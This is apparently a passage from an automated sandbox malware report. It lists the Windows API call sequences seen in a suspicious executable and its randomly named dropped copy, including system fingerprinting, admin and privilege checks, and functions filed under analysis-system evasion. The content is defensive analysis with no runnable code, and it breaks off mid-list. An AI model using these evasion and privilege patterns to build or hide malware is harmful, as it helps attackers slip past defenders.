GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,31_2_0111D300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,31_2_0111CD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0111CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,31_2_0111CFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01119ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,31_2_01119ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,33_2_012FD300
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,33_2_012FCD50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCDC0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,33_2_012FCFE9
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,33_2_012F9ED0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F1190 GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,VirtualProtect,VirtualProtect,VirtualProtect,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,22_2_012F1190
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,Writ
eFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 22_2_012E4B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01594B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,Writ
eFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 25_2_01594B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,Writ
eFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 27_2_00AE4B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 29_2_012A4B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01114B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 31_2_01114B00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 33_2_012F4B00
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403A20
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,1_2_00402D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,22_2_012E1170
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,22_2_012ED970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,StrStrIA,22_2_01302B40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,22_2_01302BB0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetUserNameA,memset,StrStrIA,22_2_012FADE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,22_2_013025C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,22_2_01301460
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,22_2_01303CE0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryE